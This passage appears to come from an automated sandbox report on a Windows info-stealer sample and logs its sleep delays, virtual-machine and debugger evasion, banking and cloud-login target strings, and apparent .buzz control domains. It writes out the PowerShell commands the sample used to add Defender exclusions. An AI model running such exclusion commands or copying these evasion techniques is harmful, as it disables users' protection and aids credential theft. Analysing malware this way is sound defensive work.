                Source: C:\Users\user\Desktop\OiMp3TH.exe Thread delayed: delay time: 597547
                Source: C:\Users\user\Desktop\OiMp3TH.exe Thread delayed: delay time: 597437
                Source: C:\Users\user\Desktop\OiMp3TH.exe Thread delayed: delay time: 597328
                Source: C:\Users\user\Desktop\OiMp3TH.exe Thread delayed: delay time: 597219
                Source: C:\Users\user\Desktop\OiMp3TH.exe Thread delayed: delay time: 597108
                Source: C:\Users\user\Desktop\OiMp3TH.exe Thread delayed: delay time: 597000
                Source: C:\Users\user\Desktop\OiMp3TH.exe Thread delayed: delay time: 596871
                Source: C:\Users\user\Desktop\OiMp3TH.exe Thread delayed: delay time: 596765
                Source: C:\Users\user\Desktop\OiMp3TH.exe Thread delayed: delay time: 596631
                Source: C:\Users\user\Desktop\OiMp3TH.exe Thread delayed: delay time: 596500
                Source: C:\Users\user\Desktop\OiMp3TH.exe Thread delayed: delay time: 596390
                Source: C:\Users\user\Desktop\OiMp3TH.exe Thread delayed: delay time: 596281
                Source: C:\Users\user\Desktop\OiMp3TH.exe Thread delayed: delay time: 596172
                Source: C:\Users\user\Desktop\OiMp3TH.exe Thread delayed: delay time: 596047
                Source: C:\Users\user\Desktop\OiMp3TH.exe Thread delayed: delay time: 595937
                Source: C:\Users\user\Desktop\OiMp3TH.exe Thread delayed: delay time: 595828
                Source: C:\Users\user\Desktop\OiMp3TH.exe Thread delayed: delay time: 595712
                Source: C:\Users\user\Desktop\OiMp3TH.exe Thread delayed: delay time: 595606
                Source: C:\Users\user\Desktop\OiMp3TH.exe Thread delayed: delay time: 595500
                Source: C:\Users\user\Desktop\OiMp3TH.exe Thread delayed: delay time: 595390
                Source: C:\Users\user\Desktop\OiMp3TH.exe Thread delayed: delay time: 595281
                Source: C:\Users\user\Desktop\OiMp3TH.exe Thread delayed: delay time: 595172
                Source: C:\Users\user\Desktop\OiMp3TH.exe Thread delayed: delay time: 595047
                Source: C:\Users\user\Desktop\OiMp3TH.exe Thread delayed: delay time: 594937
                Source: C:\Users\user\Desktop\OiMp3TH.exe Thread delayed: delay time: 594828
                Source: C:\Users\user\Desktop\OiMp3TH.exe Thread delayed: delay time: 594719
                Source: C:\Users\user\Desktop\OiMp3TH.exe Thread delayed: delay time: 594594
                Source: C:\Users\user\Desktop\OiMp3TH.exe Thread delayed: delay time: 594484
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Thread delayed: delay time: 922337203685477 (2 identical entries)
                Source: C:\Users\user\Desktop\OiMp3TH.exe Window / User API: threadDelayed 7559
                Source: C:\Users\user\Desktop\OiMp3TH.exe Window / User API: threadDelayed 2039
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Window / User API: threadDelayed 7794
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Window / User API: threadDelayed 1776
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Window / User API: threadDelayed 8037
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Window / User API: threadDelayed 1520
                Source: C:\Users\user\Desktop\OiMp3TH.exe TID: 3452 Thread sleep count: 7559 > 30
                Source: C:\Users\user\Desktop\OiMp3TH.exe TID: 3452 Thread sleep count: 2039 > 30
                Source: C:\Users\user\Desktop\OiMp3TH.exe TID: 1560 Thread sleep count: 37 > 30
                Source: C:\Users\user\Desktop\OiMp3TH.exe TID: 1560 Thread sleep time: -34126476536362649s >= -30000s
                Source: C:\Users\user\Desktop\OiMp3TH.exe TID: 1560 Thread sleep time: -600000s >= -30000s
                Source: C:\Users\user\Desktop\OiMp3TH.exe TID: 1560 Thread sleep time: -599877s >= -30000s
                Source: C:\Users\user\Desktop\OiMp3TH.exe TID: 1560 Thread sleep time: -599750s >= -30000s
                Source: C:\Users\user\Desktop\OiMp3TH.exe TID: 1560 Thread sleep time: -599631s >= -30000s
                Source: C:\Users\user\Desktop\OiMp3TH.exe TID: 1560 Thread sleep time: -599512s >= -30000s
                Source: C:\Users\user\Desktop\OiMp3TH.exe TID: 1560 Thread sleep time: -599406s >= -30000s
                Source: C:\Users\user\Desktop\OiMp3TH.exe TID: 1560 Thread sleep time: -599221s >= -30000s
                Source: C:\Users\user\Desktop\OiMp3TH.exe TID: 1560 Thread sleep time: -599094s >= -30000s
                Source: C:\Users\user\Desktop\OiMp3TH.exe TID: 1560 Thread sleep time: -598984s >= -30000s
                Source: C:\Users\user\Desktop\OiMp3TH.exe TID: 1560 Thread sleep time: -598875s >= -30000s
                Source: C:\Users\user\Desktop\OiMp3TH.exe TID: 1560 Thread sleep time: -598766s >= -30000s
                Source: C:\Users\user\Desktop\OiMp3TH.exe TID: 1560 Thread sleep time: -598656s >= -30000s
                Source: C:\Users\user\Desktop\OiMp3TH.exe TID: 1560 Thread sleep time: -598547s >= -30000s
                Source: C:\Users\user\Desktop\OiMp3TH.exe TID: 1560 Thread sleep time: -598436s >= -30000s
                Source: C:\Users\user\Desktop\OiMp3TH.exe TID: 1560 Thread sleep time: -598328s >= -30000s
                Source: C:\Users\user\Desktop\OiMp3TH.exe TID: 1560 Thread sleep time: -598219s >= -30000s
                Source: C:\Users\user\Desktop\OiMp3TH.exe TID: 1560 Thread sleep time: -598094s >= -30000s
                Source: C:\Users\user\Desktop\OiMp3TH.exe TID: 1560 Thread sleep time: -597984s >= -30000s
                Source: C:\Users\user\Desktop\OiMp3TH.exe TID: 1560 Thread sleep time: -597875s >= -30000s
                Source: C:\Users\user\Desktop\OiMp3TH.exe TID: 1560 Thread sleep time: -597765s >= -30000s
                Source: C:\Users\user\Desktop\OiMp3TH.exe TID: 1560 Thread sleep time: -597656s >= -30000s
                Source: C:\Users\user\Desktop\OiMp3TH.exe TID: 1560Thread sleep time: -597547s >= -30000sJump to behavior
                Source: C:\Users\user\Desktop\OiMp3TH.exe TID: 1560Thread sleep time: -597437s >= -30000sJump to behavior
                Source: C:\Users\user\Desktop\OiMp3TH.exe TID: 1560Thread sleep time: -597328s >= -30000sJump to behavior
                Source: C:\Users\user\Desktop\OiMp3TH.exe TID: 1560Thread sleep time: -597219s >= -30000sJump to behavior
                Source: C:\Users\user\Desktop\OiMp3TH.exe TID: 1560Thread sleep time: -597108s >= -30000sJump to behavior
                Source: C:\Users\user\Desktop\OiMp3TH.exe TID: 1560Thread sleep time: -597000s >= -30000sJump to behavior
                Source: C:\Users\user\Desktop\OiMp3TH.exe TID: 1560Thread sleep time: -596871s >= -30000sJump to behavior
                Source: C:\Users\user\Desktop\OiMp3TH.exe TID: 1560Thread sleep time: -596765s >= -30000sJump to behavior
                Source: C:\Users\user\Desktop\OiMp3TH.exe TID: 1560Thread sleep time: -596631s >= -30000sJump to behavior
                Source: C:\Users\user\Desktop\OiMp3TH.exe TID: 1560Thread sleep time: -596500s >= -30000sJump to behavior
                Source: C:\Users\user\Desktop\OiMp3TH.exe TID: 1560Thread sleep time: -596390s >= -30000sJump to behavior
                Source: C:\Users\user\Desktop\OiMp3TH.exe TID: 1560Thread sleep time: -596281s >= -30000sJump to behavior
                Source: C:\Users\user\Desktop\OiMp3TH.exe TID: 1560Thread sleep time: -596172s >= -30000sJump to behavior
                Source: C:\Users\user\Desktop\OiMp3TH.exe TID: 1560Thread sleep time: -596047s >= -30000sJump to behavior
                Source: C:\Users\user\Desktop\OiMp3TH.exe TID: 1560Thread sleep time: -595937s >= -30000sJump to behavior
                Source: C:\Users\user\Desktop\OiMp3TH.exe TID: 1560Thread sleep time: -595828s >= -30000sJump to behavior
                Source: C:\Users\user\Desktop\OiMp3TH.exe TID: 1560Thread sleep time: -595712s >= -30000sJump to behavior
                Source: C:\Users\user\Desktop\OiMp3TH.exe TID: 1560Thread sleep time: -595606s >= -30000sJump to behavior
                Source: C:\Users\user\Desktop\OiMp3TH.exe TID: 1560Thread sleep time: -595500s >= -30000sJump to behavior
                Source: C:\Users\user\Desktop\OiMp3TH.exe TID: 1560Thread sleep time: -595390s >= -30000sJump to behavior
                Source: C:\Users\user\Desktop\OiMp3TH.exe TID: 1560Thread sleep time: -595281s >= -30000sJump to behavior
                Source: C:\Users\user\Desktop\OiMp3TH.exe TID: 1560Thread sleep time: -595172s >= -30000sJump to behavior
                Source: C:\Users\user\Desktop\OiMp3TH.exe TID: 1560Thread sleep time: -595047s >= -30000sJump to behavior
                Source: C:\Users\user\Desktop\OiMp3TH.exe TID: 1560Thread sleep time: -594937s >= -30000sJump to behavior
                Source: C:\Users\user\Desktop\OiMp3TH.exe TID: 1560Thread sleep time: -594828s >= -30000sJump to behavior
                Source: C:\Users\user\Desktop\OiMp3TH.exe TID: 1560Thread sleep time: -594719s >= -30000sJump to behavior
                Source: C:\Users\user\Desktop\OiMp3TH.exe TID: 1560Thread sleep time: -594594s >= -30000sJump to behavior
                Source: C:\Users\user\Desktop\OiMp3TH.exe TID: 1560Thread sleep time: -594484s >= -30000sJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 4668Thread sleep time: -5534023222112862s >= -30000sJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 6528Thread sleep time: -2767011611056431s >= -30000sJump to behavior
                Source: C:\nhrhvnf\ghhqoznpon_638708802577261661.exe TID: 6196Thread sleep count: 247 > 30Jump to behavior
                Source: C:\nhrhvnf\ghhqoznpon_638708802577261661.exe TID: 6204Thread sleep time: -180000s >= -30000sJump to behavior
                Source: C:\nhrhvnf\ghhqoznpon_638708802577261661.exe TID: 6204Thread sleep time: -30000s >= -30000sJump to behavior
                Source: C:\nhrhvnf\ghhqoznpon_638708802577261661.exeWMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT * FROM Win32_BIOS
                Source: C:\Users\user\Desktop\OiMp3TH.exeThread delayed: delay time: 922337203685477Jump to behavior
                Source: C:\Users\user\Desktop\OiMp3TH.exeThread delayed: delay time: 600000Jump to behavior
                Source: C:\Users\user\Desktop\OiMp3TH.exeThread delayed: delay time: 599877Jump to behavior
                Source: C:\Users\user\Desktop\OiMp3TH.exeThread delayed: delay time: 599750Jump to behavior
                Source: C:\Users\user\Desktop\OiMp3TH.exeThread delayed: delay time: 599631Jump to behavior
                Source: C:\Users\user\Desktop\OiMp3TH.exeThread delayed: delay time: 599512Jump to behavior
                Source: C:\Users\user\Desktop\OiMp3TH.exeThread delayed: delay time: 599406Jump to behavior
                Source: C:\Users\user\Desktop\OiMp3TH.exeThread delayed: delay time: 599221Jump to behavior
                Source: C:\Users\user\Desktop\OiMp3TH.exeThread delayed: delay time: 599094Jump to behavior
                Source: C:\Users\user\Desktop\OiMp3TH.exeThread delayed: delay time: 598984Jump to behavior
                Source: C:\Users\user\Desktop\OiMp3TH.exeThread delayed: delay time: 598875Jump to behavior
                Source: C:\Users\user\Desktop\OiMp3TH.exeThread delayed: delay time: 598766Jump to behavior
                Source: C:\Users\user\Desktop\OiMp3TH.exeThread delayed: delay time: 598656Jump to behavior
                Source: C:\Users\user\Desktop\OiMp3TH.exeThread delayed: delay time: 598547Jump to behavior
                Source: C:\Users\user\Desktop\OiMp3TH.exeThread delayed: delay time: 598436Jump to behavior
                Source: C:\Users\user\Desktop\OiMp3TH.exeThread delayed: delay time: 598328Jump to behavior
                Source: C:\Users\user\Desktop\OiMp3TH.exeThread delayed: delay time: 598219Jump to behavior
                Source: C:\Users\user\Desktop\OiMp3TH.exeThread delayed: delay time: 598094Jump to behavior
                Source: C:\Users\user\Desktop\OiMp3TH.exeThread delayed: delay time: 597984Jump to behavior
                Source: C:\Users\user\Desktop\OiMp3TH.exeThread delayed: delay time: 597875Jump to behavior
                Source: C:\Users\user\Desktop\OiMp3TH.exeThread delayed: delay time: 597765Jump to behavior
                Source: C:\Users\user\Desktop\OiMp3TH.exeThread delayed: delay time: 597656Jump to behavior
                Source: C:\Users\user\Desktop\OiMp3TH.exeThread delayed: delay time: 597547Jump to behavior
                Source: C:\Users\user\Desktop\OiMp3TH.exeThread delayed: delay time: 597437Jump to behavior
                Source: C:\Users\user\Desktop\OiMp3TH.exeThread delayed: delay time: 597328Jump to behavior
                Source: C:\Users\user\Desktop\OiMp3TH.exeThread delayed: delay time: 597219Jump to behavior
                Source: C:\Users\user\Desktop\OiMp3TH.exeThread delayed: delay time: 597108Jump to behavior
                Source: C:\Users\user\Desktop\OiMp3TH.exeThread delayed: delay time: 597000Jump to behavior
                Source: C:\Users\user\Desktop\OiMp3TH.exeThread delayed: delay time: 596871Jump to behavior
                Source: C:\Users\user\Desktop\OiMp3TH.exeThread delayed: delay time: 596765Jump to behavior
                Source: C:\Users\user\Desktop\OiMp3TH.exeThread delayed: delay time: 596631Jump to behavior
                Source: C:\Users\user\Desktop\OiMp3TH.exeThread delayed: delay time: 596500Jump to behavior
                Source: C:\Users\user\Desktop\OiMp3TH.exeThread delayed: delay time: 596390Jump to behavior
                Source: C:\Users\user\Desktop\OiMp3TH.exeThread delayed: delay time: 596281Jump to behavior
                Source: C:\Users\user\Desktop\OiMp3TH.exeThread delayed: delay time: 596172Jump to behavior
                Source: C:\Users\user\Desktop\OiMp3TH.exeThread delayed: delay time: 596047Jump to behavior
                Source: C:\Users\user\Desktop\OiMp3TH.exeThread delayed: delay time: 595937Jump to behavior
                Source: C:\Users\user\Desktop\OiMp3TH.exeThread delayed: delay time: 595828Jump to behavior
                Source: C:\Users\user\Desktop\OiMp3TH.exeThread delayed: delay time: 595712Jump to behavior
                Source: C:\Users\user\Desktop\OiMp3TH.exeThread delayed: delay time: 595606Jump to behavior
                Source: C:\Users\user\Desktop\OiMp3TH.exeThread delayed: delay time: 595500Jump to behavior
                Source: C:\Users\user\Desktop\OiMp3TH.exeThread delayed: delay time: 595390Jump to behavior
                Source: C:\Users\user\Desktop\OiMp3TH.exeThread delayed: delay time: 595281Jump to behavior
                Source: C:\Users\user\Desktop\OiMp3TH.exeThread delayed: delay time: 595172Jump to behavior
                Source: C:\Users\user\Desktop\OiMp3TH.exeThread delayed: delay time: 595047Jump to behavior
                Source: C:\Users\user\Desktop\OiMp3TH.exeThread delayed: delay time: 594937Jump to behavior
                Source: C:\Users\user\Desktop\OiMp3TH.exeThread delayed: delay time: 594828Jump to behavior
                Source: C:\Users\user\Desktop\OiMp3TH.exeThread delayed: delay time: 594719Jump to behavior
                Source: C:\Users\user\Desktop\OiMp3TH.exeThread delayed: delay time: 594594Jump to behavior
                Source: C:\Users\user\Desktop\OiMp3TH.exeThread delayed: delay time: 594484Jump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
                Source: ghhqoznpon_638708802577261661.exe, 00000007.00000003.2215151864.00000000038F7000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Canara Transaction PasswordVMware20,11696428655x
                Source: ghhqoznpon_638708802577261661.exe, 00000007.00000003.2215151864.00000000038F7000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: discord.comVMware20,11696428655f
                Source: ghhqoznpon_638708802577261661.exe, 00000007.00000003.2215151864.00000000038F7000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: interactivebrokers.co.inVMware20,11696428655d
                Source: ghhqoznpon_638708802577261661.exe, 00000007.00000003.2215151864.00000000038F7000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Interactive Brokers - COM.HKVMware20,11696428655
                Source: ghhqoznpon_638708802577261661.exe, 00000007.00000003.2215151864.00000000038F7000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: global block list test formVMware20,11696428655
                Source: ghhqoznpon_638708802577261661.exe, 00000007.00000003.2214946722.0000000003963000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: - GDCDYNVMware20,11696428655p
                Source: ghhqoznpon_638708802577261661.exe, 00000007.00000003.2215151864.00000000038F7000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Canara Transaction PasswordVMware20,11696428655}
                Source: ghhqoznpon_638708802577261661.exe, 00000007.00000003.2360203323.00000000006F8000.00000004.00000020.00020000.00000000.sdmp, ghhqoznpon_638708802577261661.exe, 00000007.00000003.2183388479.00000000006F8000.00000004.00000020.00020000.00000000.sdmp, ghhqoznpon_638708802577261661.exe, 00000007.00000002.2361624208.00000000006F8000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW
                Source: ghhqoznpon_638708802577261661.exe, 00000007.00000002.2361527926.000000000068E000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW(
                Source: ghhqoznpon_638708802577261661.exe, 00000007.00000003.2215151864.00000000038F7000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Interactive Brokers - EU East & CentralVMware20,11696428655
                Source: ghhqoznpon_638708802577261661.exe, 00000007.00000003.2215151864.00000000038F7000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Canara Change Transaction PasswordVMware20,11696428655^
                Source: ghhqoznpon_638708802577261661.exe, 00000007.00000003.2215151864.00000000038F7000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: account.microsoft.com/profileVMware20,11696428655u
                Source: ghhqoznpon_638708802577261661.exe, 00000007.00000002.2362101522.0000000000EF3000.00000040.00000001.01000000.00000007.sdmpBinary or memory string: &VBoxService.exe
                Source: ghhqoznpon_638708802577261661.exe, 00000007.00000003.2215151864.00000000038F7000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: secure.bankofamerica.comVMware20,11696428655|UE
                Source: OiMp3TH.exe, 00000000.00000002.4460315252.00000000013F1000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll <
                Source: ghhqoznpon_638708802577261661.exe, 00000007.00000003.2215151864.00000000038F7000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: www.interactivebrokers.comVMware20,11696428655}
                Source: ghhqoznpon_638708802577261661.exe, 00000007.00000003.2360203323.00000000006F8000.00000004.00000020.00020000.00000000.sdmp, ghhqoznpon_638708802577261661.exe, 00000007.00000003.2183388479.00000000006F8000.00000004.00000020.00020000.00000000.sdmp, ghhqoznpon_638708802577261661.exe, 00000007.00000002.2361624208.00000000006F8000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW!
                Source: ghhqoznpon_638708802577261661.exe, 00000007.00000003.2215151864.00000000038F7000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Interactive Brokers - GDCDYNVMware20,11696428655p
                Source: ghhqoznpon_638708802577261661.exe, 00000007.00000003.2215151864.00000000038F7000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Interactive Brokers - EU WestVMware20,11696428655n
                Source: ghhqoznpon_638708802577261661.exe, 00000007.00000003.2215151864.00000000038F7000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: outlook.office365.comVMware20,11696428655t
                Source: ghhqoznpon_638708802577261661.exe, 00000007.00000003.2215151864.00000000038F7000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: microsoft.visualstudio.comVMware20,11696428655x
                Source: ghhqoznpon_638708802577261661.exe, 00000007.00000003.2215151864.00000000038F7000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Canara Change Transaction PasswordVMware20,11696428655
                Source: ghhqoznpon_638708802577261661.exe, 00000007.00000003.2215151864.00000000038F7000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: outlook.office.comVMware20,11696428655s
                Source: ghhqoznpon_638708802577261661.exe, 00000007.00000003.2215151864.00000000038F7000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: www.interactivebrokers.co.inVMware20,11696428655~
                Source: ghhqoznpon_638708802577261661.exe, 00000007.00000003.2215151864.00000000038F7000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: ms.portal.azure.comVMware20,11696428655
                Source: ghhqoznpon_638708802577261661.exe, 00000007.00000002.2362101522.0000000000EF3000.00000040.00000001.01000000.00000007.sdmpBinary or memory string: VBoxService.exe
                Source: ghhqoznpon_638708802577261661.exe, 00000007.00000003.2215151864.00000000038F7000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: AMC password management pageVMware20,11696428655
                Source: ghhqoznpon_638708802577261661.exe, 00000007.00000003.2215151864.00000000038F7000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: tasks.office.comVMware20,11696428655o
                Source: ghhqoznpon_638708802577261661.exe, 00000007.00000003.2215151864.00000000038F7000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Interactive Brokers - NDCDYNVMware20,11696428655z
                Source: ghhqoznpon_638708802577261661.exe, 00000007.00000003.2215151864.00000000038F7000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: turbotax.intuit.comVMware20,11696428655t
                Source: ghhqoznpon_638708802577261661.exe, 00000007.00000003.2215151864.00000000038F7000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: interactivebrokers.comVMware20,11696428655
                Source: ghhqoznpon_638708802577261661.exe, 00000007.00000003.2215151864.00000000038F7000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Interactive Brokers - non-EU EuropeVMware20,11696428655
                Source: ghhqoznpon_638708802577261661.exe, 00000007.00000002.2362101522.000000000103D000.00000040.00000001.01000000.00000007.sdmpBinary or memory string: ~VirtualMachineTypes
                Source: ghhqoznpon_638708802577261661.exe, 00000007.00000003.2215151864.00000000038F7000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: dev.azure.comVMware20,11696428655j
                Source: ghhqoznpon_638708802577261661.exe, 00000007.00000003.2215151864.00000000038F7000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: netportal.hdfcbank.comVMware20,11696428655
                Source: ghhqoznpon_638708802577261661.exe, 00000007.00000003.2214946722.0000000003963000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: YNVMware
                Source: ghhqoznpon_638708802577261661.exe, 00000007.00000002.2362101522.000000000103D000.00000040.00000001.01000000.00000007.sdmpBinary or memory string: ]DLL_Loader_VirtualMachine
                Source: ghhqoznpon_638708802577261661.exe, 00000007.00000002.2362101522.0000000000EF3000.00000040.00000001.01000000.00000007.sdmpBinary or memory string: VMWare
                Source: ghhqoznpon_638708802577261661.exe, 00000007.00000003.2215151864.00000000038F7000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Interactive Brokers - HKVMware20,11696428655]
                Source: ghhqoznpon_638708802577261661.exe, 00000007.00000002.2362101522.000000000103D000.00000040.00000001.01000000.00000007.sdmpBinary or memory string: DLL_Loader_Marker]DLL_Loader_VirtualMachineZDLL_Loader_Reloc_Unit
                Source: ghhqoznpon_638708802577261661.exe, 00000007.00000003.2215151864.00000000038F7000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: bankofamerica.comVMware20,11696428655x
                Source: ghhqoznpon_638708802577261661.exe, 00000007.00000003.2215151864.00000000038F7000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: trackpan.utiitsl.comVMware20,11696428655h
                Source: ghhqoznpon_638708802577261661.exe, 00000007.00000003.2215151864.00000000038F7000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Test URL for global passwords blocklistVMware20,11696428655
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information queried: ProcessInformationJump to behavior

                Anti Debugging

                Source: C:\nhrhvnf\ghhqoznpon_638708802577261661.exe | Thread information set: HideFromDebugger
                Source: C:\nhrhvnf\ghhqoznpon_638708802577261661.exe | Thread information set: HideFromDebugger
                Source: C:\Users\user\Desktop\OiMp3TH.exe | Process token adjusted: Debug
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Process token adjusted: Debug
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Process token adjusted: Debug
                Source: C:\Users\user\Desktop\OiMp3TH.exe | Memory allocated: page read and write | page guard

                HIPS / PFW / Operating System Protection Evasion

                Source: C:\Users\user\Desktop\OiMp3TH.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath 'C:\nhrhvnf'
                Source: C:\Users\user\Desktop\OiMp3TH.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath 'C:\Users'
                Source: C:\Users\user\Desktop\OiMp3TH.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath 'C:\nhrhvnf'Jump to behavior
                Source: C:\Users\user\Desktop\OiMp3TH.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath 'C:\Users'Jump to behavior
                Source: ghhqoznpon_638708802577261661.exe, 00000007.00000002.2362101522.0000000000EA1000.00000040.00000001.01000000.00000007.sdmpString found in binary or memory: hummskitnj.buzz
                Source: ghhqoznpon_638708802577261661.exe, 00000007.00000002.2362101522.0000000000EA1000.00000040.00000001.01000000.00000007.sdmpString found in binary or memory: cashfuzysao.buzz
                Source: ghhqoznpon_638708802577261661.exe, 00000007.00000002.2362101522.0000000000EA1000.00000040.00000001.01000000.00000007.sdmpString found in binary or memory: appliacnesot.buzz
                Source: ghhqoznpon_638708802577261661.exe, 00000007.00000002.2362101522.0000000000EA1000.00000040.00000001.01000000.00000007.sdmpString found in binary or memory: screwamusresz.buzz
                Source: ghhqoznpon_638708802577261661.exe, 00000007.00000002.2362101522.0000000000EA1000.00000040.00000001.01000000.00000007.sdmpString found in binary or memory: inherineau.buzz
                Source: ghhqoznpon_638708802577261661.exe, 00000007.00000002.2362101522.0000000000EA1000.00000040.00000001.01000000.00000007.sdmpString found in binary or memory: scentniej.buzz
                Source: ghhqoznpon_638708802577261661.exe, 00000007.00000002.2362101522.0000000000EA1000.00000040.00000001.01000000.00000007.sdmpString found in binary or memory: rebuildeso.buzz
                Source: ghhqoznpon_638708802577261661.exe, 00000007.00000002.2362101522.0000000000EA1000.00000040.00000001.01000000.00000007.sdmpString found in binary or memory: prisonyfork.buzz
                Source: C:\Users\user\Desktop\OiMp3TH.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath 'C:\nhrhvnf'Jump to behavior
                Source: C:\Users\user\Desktop\OiMp3TH.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath 'C:\Users'Jump to behavior
                Source: C:\Users\user\Desktop\OiMp3TH.exeProcess created: C:\nhrhvnf\ghhqoznpon_638708802577261661.exe "C:\nhrhvnf\ghhqoznpon_638708802577261661.exe" Jump to behavior
                Source: C:\Users\user\Desktop\OiMp3TH.exeQueries volume information: C:\Users\user\Desktop\OiMp3TH.exe VolumeInformationJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformationJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformationJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformationJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-GroupPolicy-ClientTools-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.Management.Infrastructure.Native\v4.0_1.0.0.0__31bf3856ad364e35\Microsoft.Management.Infrastructure.Native.dll VolumeInformationJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\AppvClient\Microsoft.AppV.AppVClientPowerShell.dll VolumeInformationJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformationJump to behavior
